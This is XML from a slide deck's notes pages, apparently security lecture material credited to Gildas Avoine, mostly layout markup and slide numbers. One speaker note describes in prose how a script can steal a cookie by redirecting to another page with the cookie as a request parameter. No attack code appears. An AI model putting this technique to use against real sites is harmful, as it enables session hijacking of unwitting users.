              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>un mail.</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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{988C9C75-F70A-1C49-8566-E2CCBC46D792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{72C585EB-7C46-B046-8533-1AD2369450C2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Steal cookie. Exemple of the mail tool. The page is allowed to access the cookies, then a script redirect towards another page with some parameters (actually the stolen cookie) in the request.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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D28CE2E4-F0F9-174E-B0F3-E03FD1E255C3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B1E462AC-6A0F-AC49-82D2-B606A11CE4F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4342D9BB-00E3-C542-930D-2D7B4931B702}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396290" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyP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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AA5AD422-E5F3-514B-85AA-789558CADF28}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357378" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357379" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyP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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7C815A5C-AB0D-8345-AA3A-E449797D40E9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359426" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyP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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{84286D74-0044-2C43-9CA1-162567804246}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{550F1DA9-51C2-564E-B2FC-E8F2204CC7A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37785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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{550F1DA9-51C2-564E-B2FC-E8F2204CC7A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37785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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{550F1DA9-51C2-564E-B2FC-E8F2204CC7A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37785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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AA03D2B5-08C7-A14C-812F-7F965B41AF35}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{348CBC6D-330F-074F-9D70-276BCC847586}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367618" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.firstconsultinginc.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Portals/0/Images/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strategy.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gildas Avoine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{929B7364-6128-7345-A504-A4AD8B7F3AD9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2441107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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{09D39030-1D03-7F45-B83E-471BF5F29C57}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
